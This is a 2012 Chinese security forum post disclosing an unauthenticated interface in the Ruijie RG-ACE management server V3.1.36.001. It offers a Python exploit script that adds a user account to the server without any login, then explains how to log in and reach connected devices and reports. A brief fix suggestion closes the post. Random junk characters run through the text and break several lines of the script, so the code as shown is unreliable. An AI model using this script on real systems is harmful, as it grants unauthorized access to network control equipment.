找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1928|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
0 M" U' Q# g& C  R
& A% u# O3 g+ l! O* x, h( T! B# C$ b( [# J7 Q7 s' l% A
测试的具体版本是0 q2 r, a1 F5 w/ }$ `
产品名称: 锐捷应用控制引擎
, [2 A  C% h" ~: j% O) @0 z版本号: 3.1.36.001 TC' B& J7 c0 N8 E7 M/ C# c
编译时间: 201104291730
3 i& T' J8 |1 f9 B* S$ k
$ Q+ z' k/ O0 w) ~! ?3 I0 m3 @( {# s) r
漏洞证明:# T: D0 g2 d  F
: X$ q- h' K) E7 v8 \
( _( J0 k! p) S

( G- |8 t  J' u
# t& s* ?' t4 G- ~1 c
; v& e9 |- J# I3 z% q# P
/ J. u5 O9 B  u# ?$ o: T; Z执行脚本3 [$ U2 I. J& a; O& r; ?
#! /usr/bin/env python0 T2 q7 k3 U. B+ _
#coding=gbk* @5 |+ R9 Q/ ?) U* Q
#RG-ACE管理服务器 V3.1.36.001
, t$ D( g" s* A9 f& a. Himport urllib2, urllib,cookielib
8 l' z) d: ~: kurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
. Y0 J0 q3 l) O9 jopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))% c4 ]* D9 O5 g' T- p
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
. X  J* L7 a8 lpost=(("event","userManager.doInsertUserInfo"),
( O6 e! O1 o: T  |("useractionname","addButtonValue"),( _( @. p6 I0 D; t2 F' p
("useropermanager","userManager"),1 b  g4 o3 j, s' t5 }/ U
("userName","t"), #######账号自己加
, V/ h7 ]- @1 Q0 T5 x- L+ ]6 T("pwd","aaaaaa"),######密码自己加
9 d: B4 S8 A( l5 ]% }  p("trueName","ad"),0 ]6 x: E  L4 c( m- O
("email",""),
2 `" X8 ]7 |  o9 K("mobilePhone",""),
/ G% k1 s+ |( r( r* J("officePhone",""),$ t7 N2 H/ H8 d. e9 R3 |; h, v
("addr",""),
$ G: s/ Y: [" S("submit","确定"))& D& b: x5 u% X* p% L
urllib2.install_opener(opener)1 D- Z2 r' t3 p5 x! k6 ?
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
4 f  x2 L+ j. n4 m1 u' eprint "Done"* T* I2 ^, `; R% l

& Y: h, \+ [: E6 `0 R登录,连接设备7 H; z! ]4 Z4 J* {6 e; L4 w* l$ u

0 E) D  V) F# \* v% U7 M# D" c1 ]9 e$ w  j

1 s# K# V7 v& M
0 F' ?, ]3 U" z1 ?3 x+ y* n# c" F, q/ I/ z8 s" _: p; T; ?- ?$ H
默认的管理员admin权限更大点
/ \# b1 [- R8 _5 S2 t5 H, {, E/ |) A" F+ m) L. y! c

$ l7 t9 {- S2 T* ~: P( j9 m/ c# s$ [, z" w9 z' c

: k' O0 M9 E  e" _; I. L
' y! `% v& T: w7 T2 \- W% Z# }修复方案:+ J8 c% r3 w3 @+ B
加强对接口的权限验证# O6 v2 T; G1 G! R
: v7 i2 H  S$ a  Z* c3 a/ d  ]& ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表